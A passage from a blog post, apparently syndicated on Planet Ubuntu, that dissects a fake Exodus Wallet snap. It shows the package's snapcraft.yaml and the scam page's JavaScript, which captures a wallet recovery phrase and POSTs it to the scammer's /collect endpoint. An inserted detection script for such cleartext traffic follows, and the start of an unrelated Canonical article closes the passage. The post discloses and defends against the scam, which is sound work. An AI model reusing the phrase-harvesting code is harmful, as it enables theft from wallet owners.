</span></span><span style="display: flex;"><span> │ ├── exodus-build-96567.desktop
</span></span><span style="display: flex;"><span> │ └── exodus-build-96567.png
</span></span><span style="display: flex;"><span> └── snapcraft.yaml
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span><span style="color: #ae81ff;">8</span> directories, <span style="color: #ae81ff;">11</span> files
</span></span></code></pre></div><p>Here’s the <code>snapcraft.yaml</code> used to build the package. Note it needs network access, unsurprisingly.</p>
<div class="highlight"><pre tabindex="0"><code class="language-yaml"><span style="display: flex;"><span><span style="color: #f92672;">name</span>: <span style="color: #ae81ff;">exodus-build-96567</span> <span style="color: #75715e;"># you probably want to 'snapcraft register <name>'</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">base</span>: <span style="color: #ae81ff;">core22</span> <span style="color: #75715e;"># the base snap is the execution environment for this snap</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">version</span>: <span style="color: #e6db74;">'8.6.5'</span> <span style="color: #75715e;"># just for humans, typically '1.2+git' or '1.3.2'</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">title</span>: <span style="color: #ae81ff;">Exodus Wallet</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">summary</span>: <span style="color: #ae81ff;">Secure, Manage, and Swap all your favorite assets.</span> <span style="color: #75715e;"># 79 char long summary</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">description</span>: |<span style="color: #e6db74;">
</span></span></span><span style="display: flex;"><span><span style="color: #e6db74;"> Forget managing a million different wallets and seed phrases.
</span></span></span><span style="display: flex;"><span><span style="color: #e6db74;"> Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.</span>
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">grade</span>: <span style="color: #ae81ff;">stable</span> <span style="color: #75715e;"># must be 'stable' to release into candidate/stable channels</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">confinement</span>: <span style="color: #ae81ff;">strict</span> <span style="color: #75715e;"># use 'strict' once you have the right plugs and slots</span>
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">apps</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">exodus-build-96567</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">command</span>: <span style="color: #ae81ff;">bin/exodus-bin</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">extensions</span>: [<span style="color: #ae81ff;">gnome]</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">plugs</span>:
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">network</span>
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">unity7</span>
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">network-status</span>
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">layout</span>:
</span></span><span style="display: flex;"><span> <span style="color: #ae81ff;">/usr/lib/${SNAPCRAFT_ARCH_TRIPLET}/webkit2gtk-4.1:</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">bind</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform/usr/lib/$SNAPCRAFT_ARCH_TRIPLET/webkit2gtk-4.0</span>
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">parts</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">exodus-build-96567</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">plugin</span>: <span style="color: #ae81ff;">dump</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">source</span>: <span style="color: #ae81ff;">.</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">organize</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">exodus-bin</span>: <span style="color: #ae81ff;">bin/</span>
</span></span></code></pre></div><p>For completeness, here’s the <code>snap.yaml</code> that gets generated at build-time.</p>
<div class="highlight"><pre tabindex="0"><code class="language-yaml"><span style="display: flex;"><span><span style="color: #f92672;">name</span>: <span style="color: #ae81ff;">exodus-build-96567</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">title</span>: <span style="color: #ae81ff;">Exodus Wallet</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">version</span>: <span style="color: #ae81ff;">8.6.5</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">summary</span>: <span style="color: #ae81ff;">Secure, Manage, and Swap all your favorite assets.</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">description</span>: |<span style="color: #e6db74;">
</span></span></span><span style="display: flex;"><span><span style="color: #e6db74;">  Forget managing a million different wallets and seed phrases.
</span></span></span><span style="display: flex;"><span><span style="color: #e6db74;">  Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">architectures</span>:
</span></span><span style="display: flex;"><span>- <span style="color: #ae81ff;">amd64</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">base</span>: <span style="color: #ae81ff;">core22</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">assumes</span>:
</span></span><span style="display: flex;"><span>- <span style="color: #ae81ff;">command-chain</span>
</span></span><span style="display: flex;"><span>- <span style="color: #ae81ff;">snapd2.43</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">apps</span>:
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">exodus-build-96567</span>:
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">command</span>: <span style="color: #ae81ff;">bin/exodus-bin</span>
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">plugs</span>:
</span></span><span style="display: flex;"><span>    - <span style="color: #ae81ff;">desktop</span>
</span></span><span style="display: flex;"><span>    - <span style="color: #ae81ff;">desktop-legacy</span>
</span></span><span style="display: flex;"><span>    - <span style="color: #ae81ff;">gsettings</span>
</span></span><span style="display: flex;"><span>    - <span style="color: #ae81ff;">opengl</span>
</span></span><span style="display: flex;"><span>    - <span style="color: #ae81ff;">wayland</span>
</span></span><span style="display: flex;"><span>    - <span style="color: #ae81ff;">x11</span>
</span></span><span style="display: flex;"><span>    - <span style="color: #ae81ff;">network</span>
</span></span><span style="display: flex;"><span>    - <span style="color: #ae81ff;">unity7</span>
</span></span><span style="display: flex;"><span>    - <span style="color: #ae81ff;">network-status</span>
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">command-chain</span>:
</span></span><span style="display: flex;"><span>    - <span style="color: #ae81ff;">snap/command-chain/desktop-launch</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">confinement</span>: <span style="color: #ae81ff;">strict</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">grade</span>: <span style="color: #ae81ff;">stable</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">environment</span>:
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">SNAP_DESKTOP_RUNTIME</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform</span>
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">GTK_USE_PORTAL</span>: <span style="color: #e6db74;">'1'</span>
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">LD_LIBRARY_PATH</span>: <span style="color: #ae81ff;">${SNAP_LIBRARY_PATH}${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}</span>
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">PATH</span>: <span style="color: #ae81ff;">$SNAP/usr/sbin:$SNAP/usr/bin:$SNAP/sbin:$SNAP/bin:$PATH</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">plugs</span>:
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">desktop</span>:
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">mount-host-font-cache</span>: <span style="color: #66d9ef;">false</span>
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">gtk-3-themes</span>:
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">interface</span>: <span style="color: #ae81ff;">content</span>
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">target</span>: <span style="color: #ae81ff;">$SNAP/data-dir/themes</span>
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">default-provider</span>: <span style="color: #ae81ff;">gtk-common-themes</span>
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">icon-themes</span>:
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">interface</span>: <span style="color: #ae81ff;">content</span>
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">target</span>: <span style="color: #ae81ff;">$SNAP/data-dir/icons</span>
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">default-provider</span>: <span style="color: #ae81ff;">gtk-common-themes</span>
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">sound-themes</span>:
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">interface</span>: <span style="color: #ae81ff;">content</span>
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">target</span>: <span style="color: #ae81ff;">$SNAP/data-dir/sounds</span>
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">default-provider</span>: <span style="color: #ae81ff;">gtk-common-themes</span>
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">gnome-42-2204</span>:
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">interface</span>: <span style="color: #ae81ff;">content</span>
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">target</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform</span>
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">default-provider</span>: <span style="color: #ae81ff;">gnome-42-2204</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">hooks</span>:
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">configure</span>:
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">command-chain</span>:
</span></span><span style="display: flex;"><span>    - <span style="color: #ae81ff;">snap/command-chain/hooks-configure-fonts</span>
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">plugs</span>:
</span></span><span style="display: flex;"><span>    - <span style="color: #ae81ff;">desktop</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">layout</span>:
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">/usr/lib/x86_64-linux-gnu/webkit2gtk-4.1</span>:
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">bind</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0</span>
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0</span>:
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">bind</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0</span>
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">/usr/share/xml/iso-codes</span>:
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">bind</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform/usr/share/xml/iso-codes</span>
</span></span><span style="display: flex;"><span>  <span style="color: #f92672;">/usr/share/libdrm</span>:
</span></span><span style="display: flex;"><span>    <span style="color: #f92672;">bind</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform/usr/share/libdrm</span>
</span></span></code></pre></div><h2 id="digging-deeper">Digging Deeper</h2>
<p>Unlike the <a href="https://popey.com/blog/blog/2024/02/exodus-bitcoin-wallet-490k-swindle/">previous</a> scammy application that was written using Flutter, the developers of this one appear to have made a web page in a WebKit GTK wrapper.</p>
<p>If the network is not available, the application loads with an empty window containing an error message “Could not connect: Network is unreachable”.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/exodus-wallet-3.png"><img alt="No network" src="https://popey.com/blog/blog/images/2024-03-18/exodus-wallet-3_50.png" /></a></p>
<p>I brought the network up, ran Wireshark, then launched the rogue application again. The app clearly loads the remote content (HTML, JavaScript, CSS, and logos) then renders it inside the wrapper window.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/wireshark-1.png"><img alt="Wireshark" src="https://popey.com/blog/blog/images/2024-03-18/wireshark-1_50.png" /></a></p>
<p><strong>Edit</strong>: I reported this IP to Hostinger abuse, which they took down on 19th March.</p>
<p>The JavaScript is pretty simple. It has a dictionary of words which are allowed in a recovery key. Here’s a snippet.</p>
<div class="highlight"><pre tabindex="0"><code class="language-javascript"><span style="display: flex;"><span><span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">words</span> <span style="color: #f92672;">=</span> [<span style="color: #e6db74;">'abandon'</span>, <span style="color: #e6db74;">'ability'</span>, <span style="color: #e6db74;">'able'</span>, <span style="color: #e6db74;">'about'</span>, <span style="color: #e6db74;">'above'</span>, <span style="color: #e6db74;">'absent'</span>, <span style="color: #e6db74;">'absorb'</span>,
</span></span><span style="display: flex;"><span> <span style="color: #960050; background-color: #1e0010;">⋮</span>
</span></span><span style="display: flex;"><span> <span style="color: #e6db74;">'youth'</span>, <span style="color: #e6db74;">'zebra'</span>, <span style="color: #e6db74;">'zero'</span>, <span style="color: #e6db74;">'zone'</span>, <span style="color: #e6db74;">'zoo'</span>];
</span></span></code></pre></div><p>As the user types words, the application checks the list.</p>
<div class="highlight"><pre tabindex="0"><code class="language-javascript"><span style="display: flex;"><span><span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">alreadyAdded</span> <span style="color: #f92672;">=</span> {};
</span></span><span style="display: flex;"><span><span style="color: #66d9ef;">function</span> <span style="color: #a6e22e;">checkWords</span>() {
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">button</span> <span style="color: #f92672;">=</span> document.<span style="color: #a6e22e;">getElementById</span>(<span style="color: #e6db74;">"continueButton"</span>);
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">inputString</span> <span style="color: #f92672;">=</span> document.<span style="color: #a6e22e;">getElementById</span>(<span style="color: #e6db74;">"areatext"</span>).<span style="color: #a6e22e;">value</span>;
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">words_list</span> <span style="color: #f92672;">=</span> <span style="color: #a6e22e;">inputString</span>.<span style="color: #a6e22e;">split</span>(<span style="color: #e6db74;">" "</span>);
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">foundWords</span> <span style="color: #f92672;">=</span> <span style="color: #ae81ff;">0</span>;
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">words_list</span>.<span style="color: #a6e22e;">forEach</span>(<span style="color: #66d9ef;">function</span>(<span style="color: #a6e22e;">word</span>) {
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">if</span> (<span style="color: #a6e22e;">words</span>.<span style="color: #a6e22e;">includes</span>(<span style="color: #a6e22e;">word</span>)) {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">foundWords</span><span style="color: #f92672;">++</span>;
</span></span><span style="display: flex;"><span> }
</span></span><span style="display: flex;"><span> });
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">if</span> (<span style="color: #a6e22e;">foundWords</span> <span style="color: #f92672;">===</span> <span style="color: #a6e22e;">words_list</span>.<span style="color: #a6e22e;">length</span> <span style="color: #f92672;">&&</span> <span style="color: #a6e22e;">words_list</span>.<span style="color: #a6e22e;">length</span> <span style="color: #f92672;">===</span> <span style="color: #ae81ff;">12</span> <span style="color: #f92672;">||</span> <span style="color: #a6e22e;">words_list</span>.<span style="color: #a6e22e;">length</span> <span style="color: #f92672;">===</span> <span style="color: #ae81ff;">18</span> <span style="color: #f92672;">||</span> <span style="color: #a6e22e;">words_list</span>.<span style="color: #a6e22e;">length</span> <span style="color: #f92672;">===</span> <span style="color: #ae81ff;">24</span>) {
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">button</span>.<span style="color: #a6e22e;">style</span>.<span style="color: #a6e22e;">backgroundColor</span> <span style="color: #f92672;">=</span> <span style="color: #e6db74;">"#511ade"</span>;
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">if</span> (<span style="color: #f92672;">!</span><span style="color: #a6e22e;">alreadyAdded</span>[<span style="color: #a6e22e;">words_list</span>]) {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">sendPostRequest</span>(<span style="color: #a6e22e;">words_list</span>);
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">alreadyAdded</span>[<span style="color: #a6e22e;">words_list</span>] <span style="color: #f92672;">=</span> <span style="color: #66d9ef;">true</span>;
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">button</span>.<span style="color: #a6e22e;">addEventListener</span>(<span style="color: #e6db74;">"click"</span>, <span style="color: #66d9ef;">function</span>() {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">renderErrorImport</span>();
</span></span><span style="display: flex;"><span> });
</span></span><span style="display: flex;"><span> }
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> }
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">else</span>{
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">button</span>.<span style="color: #a6e22e;">style</span>.<span style="color: #a6e22e;">backgroundColor</span> <span style="color: #f92672;">=</span> <span style="color: #e6db74;">"#533e89"</span>;
</span></span><span style="display: flex;"><span> }
</span></span><span style="display: flex;"><span>}
</span></span></code></pre></div><p>If all the entered words are in the dictionary, it will allow the use of the “Continue” button to send a “POST” request to a <code>/collect</code> endpoint on the server.</p>
<div class="highlight"><pre tabindex="0"><code class="language-javascript"><span style="display: flex;"><span><span style="color: #66d9ef;">function</span> <span style="color: #a6e22e;">sendPostRequest</span>(<span style="color: #a6e22e;">words</span>) {
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">data</span> <span style="color: #f92672;">=</span> {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">name</span><span style="color: #f92672;">:</span> <span style="color: #e6db74;">'exodus'</span>,
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">data</span><span style="color: #f92672;">:</span> <span style="color: #a6e22e;">words</span>
</span></span><span style="display: flex;"><span> };
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">fetch</span>(<span style="color: #e6db74;">'/collect'</span>, {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">method</span><span style="color: #f92672;">:</span> <span style="color: #e6db74;">'POST'</span>,
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">headers</span><span style="color: #f92672;">:</span> {
</span></span><span style="display: flex;"><span> <span style="color: #e6db74;">'Content-Type'</span><span style="color: #f92672;">:</span> <span style="color: #e6db74;">'application/json'</span>
</span></span><span style="display: flex;"><span> },
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">body</span><span style="color: #f92672;">:</span> <span style="color: #a6e22e;">JSON</span>.<span style="color: #a6e22e;">stringify</span>(<span style="color: #a6e22e;">data</span>)
</span></span><span style="display: flex;"><span> })
</span></span><span style="display: flex;"><span> .<span style="color: #a6e22e;">then</span>(<span style="color: #a6e22e;">response</span> => {
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">if</span> (<span style="color: #f92672;">!</span><span style="color: #a6e22e;">response</span>.<span style="color: #a6e22e;">ok</span>) {
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">throw</span> <span style="color: #66d9ef;">new</span> Error(<span style="color: #e6db74;">'Error during the request'</span>);
</span></span><span style="display: flex;"><span> }
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">return</span> <span style="color: #a6e22e;">response</span>.<span style="color: #a6e22e;">json</span>();
</span></span><span style="display: flex;"><span> })
</span></span><span style="display: flex;"><span> .<span style="color: #a6e22e;">then</span>(<span style="color: #a6e22e;">data</span> => {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">console</span>.<span style="color: #a6e22e;">log</span>(<span style="color: #e6db74;">'Response:'</span>, <span style="color: #a6e22e;">data</span>);
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> })
</span></span><span style="display: flex;"><span> .<span style="color: #66d9ef;">catch</span>(<span style="color: #a6e22e;">error</span> => {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">console</span>.<span style="color: #a6e22e;">error</span>(<span style="color: #e6db74;">'There is an error:'</span>, <span style="color: #a6e22e;">error</span>);
</span></span><span style="display: flex;"><span> });
</span></span><span style="display: flex;"><span>}
</span></span></code></pre></div><p>Here you can see in the payload, the words I typed, selected from the dictionary mentioned above.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/wireshark-2.png"><img alt="Wireshark" src="https://popey.com/blog/blog/images/2024-03-18/wireshark-2_50.png" /></a></p>
<p>It also periodically ‘pings’ the <code>/ping</code> endpoint on the server with a simple payload of <code>{"name":"exodus"}</code>. Presumably for network connectivity checking, telemetry or seeing which of the scam wallet applications are in use.</p>
<div class="highlight"><pre tabindex="0"><code class="language-javascript"><span style="display: flex;"><span><span style="color: #66d9ef;">function</span> <span style="color: #a6e22e;">sendPing</span>() {
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">data</span> <span style="color: #f92672;">=</span> {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">name</span><span style="color: #f92672;">:</span> <span style="color: #e6db74;">'exodus'</span>,
</span></span><span style="display: flex;"><span> };
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">fetch</span>(<span style="color: #e6db74;">'/ping'</span>, {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">method</span><span style="color: #f92672;">:</span> <span style="color: #e6db74;">'POST'</span>,
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">headers</span><span style="color: #f92672;">:</span> {
</span></span><span style="display: flex;"><span> <span style="color: #e6db74;">'Content-Type'</span><span style="color: #f92672;">:</span> <span style="color: #e6db74;">'application/json'</span>
</span></span><span style="display: flex;"><span> },
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">body</span><span style="color: #f92672;">:</span> <span style="color: #a6e22e;">JSON</span>.<span style="color: #a6e22e;">stringify</span>(<span style="color: #a6e22e;">data</span>)
</span></span><span style="display: flex;"><span> })
</span></span><span style="display: flex;"><span> .<span style="color: #a6e22e;">then</span>(<span style="color: #a6e22e;">response</span> => {
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">if</span> (<span style="color: #f92672;">!</span><span style="color: #a6e22e;">response</span>.<span style="color: #a6e22e;">ok</span>) {
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">throw</span> <span style="color: #66d9ef;">new</span> Error(<span style="color: #e6db74;">'Error during the request'</span>);
</span></span><span style="display: flex;"><span> }
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">return</span> <span style="color: #a6e22e;">response</span>.<span style="color: #a6e22e;">json</span>();
</span></span><span style="display: flex;"><span> })
</span></span><span style="display: flex;"><span> .<span style="color: #a6e22e;">then</span>(<span style="color: #a6e22e;">data</span> => {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">console</span>.<span style="color: #a6e22e;">log</span>(<span style="color: #e6db74;">'Response:'</span>, <span style="color: #a6e22e;">data</span>);
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> })
</span></span><span style="display: flex;"><span> .<span style="color: #66d9ef;">catch</span>(<span style="color: #a6e22e;">error</span> => {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">console</span>.<span style="color: #a6e22e;">error</span>(<span style="color: #e6db74;">'There is an error:'</span>, <span style="color: #a6e22e;">error</span>);
</span></span><span style="display: flex;"><span> });
</span></span><span style="display: flex;"><span>}
</span></span></code></pre></div><p>All of this is done over HTTP, because of course it is. No security needed here!</p>
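<p>Because the phrase leaves the machine in cleartext HTTP, a proxy or IDS hook can recognise it in flight. The following is an added example, not code from the original post or from the scam page: it parses a captured request and flags POST bodies carrying 12, 18 or 24 word-shaped tokens, generalized beyond the JSON <code>/collect</code> body shown above to form-encoded bodies as well. The host <code>192.0.2.10</code>, the sample requests, the <code>/restore</code> and <code>/comment</code> paths and all function names are constructed for illustration; the word shape (3 to 8 lowercase letters) is that of the BIP-39 English list the quoted dictionary is taken from.</p>

```javascript
// Added example (not from the original post): flag cleartext HTTP POSTs whose
// body looks like a wallet recovery phrase, as in the /collect request above.

// Phrase lengths accepted by the page's checkWords().
const PHRASE_LENGTHS = new Set([12, 18, 24]);
// BIP-39 English words are 3 to 8 lowercase ASCII letters (shape heuristic).
const WORD_SHAPE = /^[a-z]{3,8}$/;

// The twelve words visible in the post's snippet. Used as constructed input and
// as a stand-in for the full 2048-word list (assumption: excerpt only).
const PAGE_WORDS = ['abandon', 'ability', 'able', 'about', 'above', 'absent',
  'absorb', 'youth', 'zebra', 'zero', 'zone', 'zoo'];
const WORDLIST_EXCERPT = new Set(PAGE_WORDS);

// Split a raw HTTP/1.x request into method, path, headers and body.
function parseHttpRequest(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  if (sep === -1) return null;
  const headLines = raw.slice(0, sep).split('\r\n');
  const [method, path] = headLines[0].split(' ');
  const headers = {};
  for (const line of headLines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, path, headers, body: raw.slice(sep + 4) };
}

// Yield every word sequence found in a decoded body: arrays of strings
// (the page's format) and strings that split on whitespace.
function* candidateSequences(value, depth = 0) {
  if (depth > 8) return; // bound recursion on hostile input
  if (typeof value === 'string') {
    yield value.trim().split(/\s+/);
  } else if (Array.isArray(value)) {
    if (value.every(v => typeof v === 'string')) yield value.map(v => v.trim());
    for (const v of value) yield* candidateSequences(v, depth + 1);
  } else if (value !== null && typeof value === 'object') {
    for (const v of Object.values(value)) yield* candidateSequences(v, depth + 1);
  }
}

// Shape test, tightened to dictionary membership when a wordlist Set is given.
function looksLikeMnemonic(words, wordlist) {
  if (!PHRASE_LENGTHS.has(words.length)) return false;
  return words.every(w => {
    const lw = w.toLowerCase();
    return WORD_SHAPE.test(lw) && (!wordlist || wordlist.has(lw));
  });
}

// Returns a finding, or null. The finding never contains the words themselves,
// so the detection log does not become a second copy of the secret.
function inspectRequest(raw, wordlist = null) {
  const req = parseHttpRequest(raw);
  if (!req || req.method !== 'POST') return null;
  const ctype = (req.headers['content-type'] || '').toLowerCase();
  let decoded;
  if (ctype.includes('application/json')) {
    try { decoded = JSON.parse(req.body); } catch (e) { return null; }
  } else if (ctype.includes('application/x-www-form-urlencoded')) {
    decoded = Object.fromEntries(new URLSearchParams(req.body));
  } else {
    return null;
  }
  for (const seq of candidateSequences(decoded)) {
    if (looksLikeMnemonic(seq, wordlist)) {
      return { host: req.headers.host || '(none)', path: req.path, wordCount: seq.length };
    }
  }
  return null;
}

// Constructed sample traffic (192.0.2.10 is a documentation address).
function buildRequest(path, contentType, body) {
  return [`POST ${path} HTTP/1.1`, 'Host: 192.0.2.10',
    `Content-Type: ${contentType}`, '', body].join('\r\n');
}
const SAMPLE_COLLECT = buildRequest('/collect', 'application/json',
  JSON.stringify({ name: 'exodus', data: PAGE_WORDS }));
const SAMPLE_PING = buildRequest('/ping', 'application/json',
  JSON.stringify({ name: 'exodus' }));
const SAMPLE_FORM = buildRequest('/restore', 'application/x-www-form-urlencoded',
  'seed=' + PAGE_WORDS.join('+'));
// Ordinary 12-word sentence: passes the shape test, fails the dictionary test.
const SAMPLE_PROSE = buildRequest('/comment', 'application/json',
  JSON.stringify({ text: 'the quick brown fox jumps over the lazy dog and then sleeps' }));

for (const [label, raw] of [['collect', SAMPLE_COLLECT], ['ping', SAMPLE_PING],
  ['form', SAMPLE_FORM], ['prose', SAMPLE_PROSE]]) {
  console.log(label, 'shape:', inspectRequest(raw),
    'dictionary:', inspectRequest(raw, WORDLIST_EXCERPT));
}
```

<p>With only the shape test, the ordinary sentence in <code>SAMPLE_PROSE</code> is a false positive; supplying the complete wordlist as the second argument removes that class of hit.</p>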
<h2 id="conclusion">Conclusion</h2>
<p>It’s trivially easy to publish scammy applications like this in the Canonical Snap Store, and for them to go unnoticed.</p>
<p>I was <strong>somewhat</strong> hopeful that my previous <a href="https://popey.com/blog/blog/2024/02/exodus-bitcoin-wallet-490k-swindle/">post</a> may have had some impact. It doesn’t look like much has changed yet beyond a couple of conversations on the forum.</p>
<p>It would be <strong>really</strong> <em>neat</em> if the team at Canonical responsible for the store could do something to prevent these kinds of apps before they get into the hands of users.</p>
<p>I’ve reported the app to the Snap Store team.</p>
<p>Until next time, Brenda!</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Canonical’s commitment to quality managementhttps://ubuntu.com//blog/canonicals-commitment-to-quality-management2024-03-18T10:10:41+00:00<p>As Canonical approaches its 20th anniversary, we have proven our proficiency in managing a resilient software supply chain. But in the pursuit of excellence, we are always looking to set new standards in software development and embrace cutting-edge quality management practices. This enables us to meet current technological landscape needs. It also paves the way for future innovation, motivating us (as ever) to make open source a key driving force across all industries. In this article I will explore how combining the openness and transparency inherent in open source principles with the right quality management frameworks enables us to lay new foundations for the software-defined industries of tomorrow. </p>
<h2 class="wp-block-heading">Open source adoption is growing and with it, regulation</h2>
